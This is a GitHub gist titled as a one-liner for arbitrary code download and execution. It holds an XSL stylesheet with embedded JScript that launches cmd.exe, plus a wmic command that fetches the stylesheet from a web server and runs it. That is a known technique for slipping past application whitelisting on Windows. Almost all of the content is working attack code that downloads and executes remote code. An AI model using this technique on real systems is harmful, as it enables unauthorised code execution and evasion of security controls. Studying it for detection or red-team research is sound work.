Skip to content

Instantly share code, notes, and snippets.

@Arno0x
Created April 18, 2018 08:41
Show Gist options
  • Star 6 You must be signed in to star a gist
  • Fork 9 You must be signed in to fork a gist
  • Save Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7 to your computer and use it in GitHub Desktop.
Save Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7 to your computer and use it in GitHub Desktop.
Oneliner for arbitrary code download and execution
<?xml version='1.0'?>
<!-- Discovered by @SubTee and @mattifestation -->
<!-- Execute with: wmic os get /format:"https://webserver/wmic.xsl" -->
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment